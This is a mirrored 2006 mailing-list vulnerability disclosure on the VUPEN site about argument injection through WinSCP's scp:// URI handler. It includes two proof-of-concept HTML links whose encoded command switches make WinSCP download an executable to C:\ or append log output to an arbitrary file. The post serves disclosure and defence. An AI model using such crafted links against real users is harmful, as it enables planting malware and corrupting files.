VUPEN Security - Security Mailinglists (Mirrored Posts)

	About Us \| Contact Us

VUPEN Free Resources

VUPEN Security Advisories

VUPEN Security Blog & News

Zero-day Attacks Monitor

Daily Security Mailinglist

Explanation of Terms

Advanced Search Engine

>> VUPEN Security / Public Mailing Lists Mirror

Assigned : VUPEN/ADV-2006-2289

From : Jelmer Kuperus <jkuperus at planet.nl>
Subject : WinSCP - URI Handler Command Switch Parsing
Date : 2006-06-11

Original Message

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a
specified file to an arbitrary ftp. or they may download executables to
a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%
20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a
c:\ (asuming the host is in the cache otherwise user interaction is
required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%
22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a
solution"

Disclaimer : VUPEN Security does not endorse the content of this message submitted by others to public mailinglists. Messages submitted to public mailinglists do not necessarily reflect the opinions or policies of VUPEN Security. VUPEN Security makes no warranties, express or implied, as to the content of the message in this page or the accuracy and reliability of any messages and other materials submitted to public mailinglists. Any questions or comments regarding this page should be sent to team@vupen.com

Monthly Statistics

VUPEN Security Advisories By Criticality: Sep 2010
Critical Risk	: 22%
High Risk	: 2%
Moderate Risk	: 49%
Low Risk	: 27%

Get a real-time view of the vulnerabilities affecting your systems using the VUPEN VNS reporting capabilities.

Try VUPEN VNS